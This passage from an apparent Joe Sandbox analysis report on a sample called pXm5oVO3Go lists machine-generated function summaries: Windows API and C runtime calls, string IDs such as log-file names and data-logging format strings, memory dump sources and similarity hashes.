                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 1676052248-3145022300
                                  • Opcode ID: 496c9456a5503aa3fbbc2231c8bbd294be282c3d36b850c8da4dc65057579891
                                  • Instruction ID: 62bf7cbec1d8700f4790014da14d411349c71620fe695fb879b4f3ed14d66504
                                  • Opcode Fuzzy Hash: 496c9456a5503aa3fbbc2231c8bbd294be282c3d36b850c8da4dc65057579891
                                  • Instruction Fuzzy Hash: A301A931900619ABCB05EBB0C852AFEB737AF80721F24021DF9117B2D1CF78AA458799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0065C590
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0065C59A
                                  • int.LIBCPMT ref: 0065C5B1
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 0065C5D4
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0065C5E8
                                  • __CxxThrowException@8.LIBCMT ref: 0065C5F6
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0065C60C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 1676052248-3145022300
                                  • Opcode ID: ef30e28e30d201cec39b9e39b2dab8913436582eab1bc4aafb0e4f233322a454
                                  • Instruction ID: 22c646ed180755f14a8ffdae357330f9e018e9015fb238a3cda8fe3d1f199111
                                  • Opcode Fuzzy Hash: ef30e28e30d201cec39b9e39b2dab8913436582eab1bc4aafb0e4f233322a454
                                  • Instruction Fuzzy Hash: 4D01AD719002099BCB05EBB0C862AFDB727AF40732F140A1DF9117B2D1DF78AA099798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660E6F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660E79
                                  • int.LIBCPMT ref: 00660E90
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660EC7
                                  • __CxxThrowException@8.LIBCMT ref: 00660ED5
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660EEB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: 0s$bad cast
                                  • API String ID: 2227438316-2111171359
                                  • Opcode ID: da0e96c1aae7ae1894c33ca0b88a39ea7249c3ab852e1fea17965fbcda95caa2
                                  • Instruction ID: 28e22f2a0183f76736cf6e528b63cac98962e73447568b09396a0688d0375d03
                                  • Opcode Fuzzy Hash: da0e96c1aae7ae1894c33ca0b88a39ea7249c3ab852e1fea17965fbcda95caa2
                                  • Instruction Fuzzy Hash: 9201AD319402199BCB05EBA0D843AFE7737AF80721F24092DF9117B2D1CF78AA458798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661E5B
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661E65
                                  • int.LIBCPMT ref: 00661E7C
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • moneypunct.LIBCPMT ref: 00661E9F
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661EB3
                                  • __CxxThrowException@8.LIBCMT ref: 00661EC1
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2090539961-3145022300
                                  • Opcode ID: 2f02889e413c2b2deabebbd3874861329ec63e5550089fb6aaba03a41fd2fe15
                                  • Instruction ID: ab1392dd9c3f9c6ac4bdd20d3824bce6b75a70f558f7115244bf5fab511da65d
                                  • Opcode Fuzzy Hash: 2f02889e413c2b2deabebbd3874861329ec63e5550089fb6aaba03a41fd2fe15
                                  • Instruction Fuzzy Hash: B501AD329002099BCB05EBA0D842AFE7727BF81721F28051DF9107B2D1CF78AA459799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0065C62D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0065C637
                                  • int.LIBCPMT ref: 0065C64E
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • messages.LIBCPMT ref: 0065C671
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0065C685
                                  • __CxxThrowException@8.LIBCMT ref: 0065C693
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0065C6A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2525416601-3145022300
                                  • Opcode ID: eb31311eb745ebb376378e41066841b6a901fffc0a9e2a7a10059b58935db701
                                  • Instruction ID: 295ccab28ba37662100bac5b56690fc281d6c3dfbe31b658235d6fcc7de3165b
                                  • Opcode Fuzzy Hash: eb31311eb745ebb376378e41066841b6a901fffc0a9e2a7a10059b58935db701
                                  • Instruction Fuzzy Hash: 2A01A1319002159BCB05EBA0C842AFDB727AF40731F14011DF9117B2D1DF78AA49879A
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066D73E
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066D748
                                  • int.LIBCPMT ref: 0066D75F
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • collate.LIBCPMT ref: 0066D782
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066D796
                                  • __CxxThrowException@8.LIBCMT ref: 0066D7A4
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066D7BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2346505839-3145022300
                                  • Opcode ID: bbff907262fb0a16318392415fcbb353a6b372bd2b19361aba4da2d6a9570208
                                  • Instruction ID: 4a557789ea30e55437683725dc081b23eb82ccf9e3f46204383c1890a41eda25
                                  • Opcode Fuzzy Hash: bbff907262fb0a16318392415fcbb353a6b372bd2b19361aba4da2d6a9570208
                                  • Instruction Fuzzy Hash: DF019271A002199BDB05EBB0D843AFE7B37AF80721F24052DF9117B2D1DF78AA458799
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _wprintf
                                  • String ID: [DATA_IN]%s$[DATA_OUT]%s$[HEADER_IN]%s$[HEADER_OUT]%s
                                  • API String ID: 2738768116-1258772499
                                  • Opcode ID: 625cc3fe3b23ffa21748f98c8a39db130a157506833062a54fe6aaef8372a764
                                  • Instruction ID: 36728138fc2062ef771174b41612b96174258983edbb5e794f746bbfc9dd3fb0
                                  • Opcode Fuzzy Hash: 625cc3fe3b23ffa21748f98c8a39db130a157506833062a54fe6aaef8372a764
                                  • Instruction Fuzzy Hash: 98F09072A502486BAB50EAE5AC4283B339AD695714F148C29FA08C7381F026E93092A7
                                  APIs
                                  • lstrlen.KERNEL32(03642558,100200B0,?,00000000,00000000,?,036416AA,?,00000004,03642558,?), ref: 0364AAFB
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,03642558,00000001,00000000,00000000,?,036416AA,?,00000004,03642558,?), ref: 0364AB11
                                  • GetLastError.KERNEL32(?,036416AA,?,00000004,03642558,?), ref: 0364AB20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,03642558,00000001,00000000,00000000,?,?,036416AA,?,00000004,03642558), ref: 0364ABAF
                                  • _free.LIBCMT ref: 0364ABC2
                                  • GetLastError.KERNEL32(?,?,036416AA,?,00000004,03642558), ref: 0364ABCA
                                  • SysAllocString.OLEAUT32(00000000), ref: 0364ABE5
                                  • _free.LIBCMT ref: 0364ABF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                  • String ID:
                                  • API String ID: 2233872252-0
                                  • Opcode ID: ddbe7017c1df06839c6bc5b3ff729aa7816e3d3f023352de6ff8d7f0f77a7cd0
                                  • Instruction ID: 8795671640f930c7c99fba26fe2f8b3863fc5f1aaa022314a0bb1bb63f5baed2
                                  • Opcode Fuzzy Hash: ddbe7017c1df06839c6bc5b3ff729aa7816e3d3f023352de6ff8d7f0f77a7cd0
                                  • Instruction Fuzzy Hash: E341D5B5D81319BBDB10DFE8CE44BAE7AB9EB49750F10412DF805EB280D678D90487A5
                                  APIs
                                  • lstrlen.KERNEL32(10002554,100200B0,?,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000AAF7
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000AB0D
                                  • GetLastError.KERNEL32(?,100016A6,?,00000004,10002554,?), ref: 1000AB1C
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000ABAB
                                  • _free.LIBCMT ref: 1000ABBE
                                  • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000ABC6
                                  • SysAllocString.OLEAUT32(00000000), ref: 1000ABE1
                                  • _free.LIBCMT ref: 1000ABF2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                  • String ID:
                                  • API String ID: 2233872252-0
                                  • Opcode ID: c525a2dc86abb622627aec347f05c5c100962417d582995e3ed933296b725680
                                  • Instruction ID: 7a9aabcc70d3fdf9ab92ec66efeb58e3645fa49096dc95b045ab2c4300f8d26f
                                  • Opcode Fuzzy Hash: c525a2dc86abb622627aec347f05c5c100962417d582995e3ed933296b725680
                                  • Instruction Fuzzy Hash: 1541F372D00319ABF710DF648C45F9F7BA9EB497E0F118229F805E7286D774AA8087A1
                                  APIs
                                  • __EH_prolog3_catch.LIBCMT ref: 0054DA3A
                                  • EnterCriticalSection.KERNEL32(?,00000010,0054DCDB,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?), ref: 0054DA4B
                                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?,0067F1C8,000000FF), ref: 0054DA69
                                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054DA9D
                                  • LeaveCriticalSection.KERNEL32(00406FA0,?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?,0067F1C8), ref: 0054DB09
                                  • _memset.LIBCMT ref: 0054DB28
                                  • TlsSetValue.KERNEL32(?,00000000,ED2F953D), ref: 0054DB39
                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?,0067F1C8,000000FF), ref: 0054DB5A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                  • String ID:
                                  • API String ID: 1891723912-0
                                  • Opcode ID: ee4e0fa6d0bc6837883920f8cdcf8fb05867f79d7c93fcca47aca23e43471762
                                  • Instruction ID: a3a7765b4c26124d50065a281d03f13c18ddca9ed2149b58fcdfd7fe28945801
                                  • Opcode Fuzzy Hash: ee4e0fa6d0bc6837883920f8cdcf8fb05867f79d7c93fcca47aca23e43471762
                                  • Instruction Fuzzy Hash: 94316D71500606EFCB24AF60D889DAABFB6FF44318B21C62DF55697650DB30AE50CFA0
                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0073EFB8,ED2F953D), ref: 004034B1
                                    • Part of subcall function 00403990: __time64.LIBCMT ref: 004039B4
                                    • Part of subcall function 00403990: __localtime64_s.LIBCMT ref: 004039C7
                                    • Part of subcall function 00403990: _memset.LIBCMT ref: 004039E2
                                    • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405539
                                    • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 0040555A
                                    • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405578
                                    • Part of subcall function 00405520: _memmove.LIBCMT ref: 004055EF
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403570
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004035B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::_$Xinvalid_argument$LockitLockit::_$CriticalInitializeSection__localtime64_s__time64_memmove_memset
                                  • String ID: --------------------------------------$.log$Open the log file$log\JumpLogin-
                                  • API String ID: 1179081484-4002143626
                                  • Opcode ID: 40f8ac4b9d59971e42a7fe8ea193fecb976f05dea2bc2a1b2d33739cbc19fb5b
                                  • Instruction ID: dd81093e7cbe42572f97faa9210dcb4426a2d0b84738156c4183c5335d05110a
                                  • Opcode Fuzzy Hash: 40f8ac4b9d59971e42a7fe8ea193fecb976f05dea2bc2a1b2d33739cbc19fb5b
                                  • Instruction Fuzzy Hash: 06510571E00208DBCB10DFA9CC81A9EFBB5EF45705F14852AE915BB3C5DB789A04CB99
                                  APIs
                                  • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00413709,ED2F953D,?,004135B5,00000002,000000FF,?,00422084), ref: 00425BCE
                                    • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                  • GdipCreateSolidFill.GDIPLUS(FF000000,00000002), ref: 00425C2D
                                  • GdipSetStringFormatAlign.GDIPLUS(10C083FF,00000001), ref: 00425C9B
                                  • GdipSetStringFormatLineAlign.GDIPLUS(10C083FF,00000001), ref: 00425CB4
                                  • SendMessageW.USER32(0073EFF4,00000403,00000000,00000064), ref: 00425CF1
                                  • SendMessageW.USER32(0073EFF4,00000418,00000000,000000C8), ref: 00425D06
                                    • Part of subcall function 00422E40: GdipCreateFontFamilyFromName.GDIPLUS(Arial,00000000,?,004136E9), ref: 00422E5B
                                    • Part of subcall function 00422E40: GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422E8B
                                    • Part of subcall function 00422E40: GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422EAA
                                    • Part of subcall function 00426490: _memmove.LIBCMT ref: 004264BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Gdip$CreateFamilyFontFormatString$AlignMessageSend$DeleteFillFromGenericLineNameSansSerifSolid_malloc_memmove
                                  • String ID: Arial
                                  • API String ID: 3100294967-493054409
                                  • Opcode ID: 7a43d62ad1391cc9c7be90a0dacc248291a14a9adb854417a3fca158cac77db2
                                  • Instruction ID: 7f92a7e877333cee7bf1d2e5f056fe5c7ee1866b486c49faf119884e683556c2
                                  • Opcode Fuzzy Hash: 7a43d62ad1391cc9c7be90a0dacc248291a14a9adb854417a3fca158cac77db2
                                  • Instruction Fuzzy Hash: E0518EB1600301AFEB04DF65DC85BAA7BF8BB44700F14867AE909DF386EB74A504CB64
                                  APIs
                                    • Part of subcall function 005394AF: GetParent.USER32(?), ref: 00539503
                                    • Part of subcall function 005394AF: GetLastActivePopup.USER32(?), ref: 00539514
                                    • Part of subcall function 005394AF: IsWindowEnabled.USER32(?), ref: 00539528
                                    • Part of subcall function 005394AF: EnableWindow.USER32(?,00000000), ref: 0053953B
                                  • EnableWindow.USER32(?,00000001), ref: 005395AE
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 005395C2
                                  • GetCurrentProcessId.KERNEL32(?,?), ref: 005395CC
                                  • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 005395E4
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00539660
                                  • EnableWindow.USER32(00000000,00000001), ref: 005396A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                  • String ID: 8@
                                  • API String ID: 1877664794-819625340
                                  • Opcode ID: 7847638c9822e494ba1cb4b1276f38bdd4c01cb8e1f561ec198642636f7e72e6
                                  • Instruction ID: 92bc13bd50d1c053b23345177d6c3dab201e50520268075aec8d8323af4d1383
                                  • Opcode Fuzzy Hash: 7847638c9822e494ba1cb4b1276f38bdd4c01cb8e1f561ec198642636f7e72e6
                                  • Instruction Fuzzy Hash: A741C5B2A01319AFDB219F64DC89BAABBB9FF44310F140599F415E7191D7B0CE808FA0
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00595EE1
                                    • Part of subcall function 0054B1CD: __EH_prolog3.LIBCMT ref: 0054B1D4
                                    • Part of subcall function 00613C22: SetRectEmpty.USER32(?), ref: 00613C52
                                  • SetRectEmpty.USER32(?), ref: 00596029
                                  • SetRectEmpty.USER32(?), ref: 00596038
                                  • SetRectEmpty.USER32(?), ref: 00596041
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
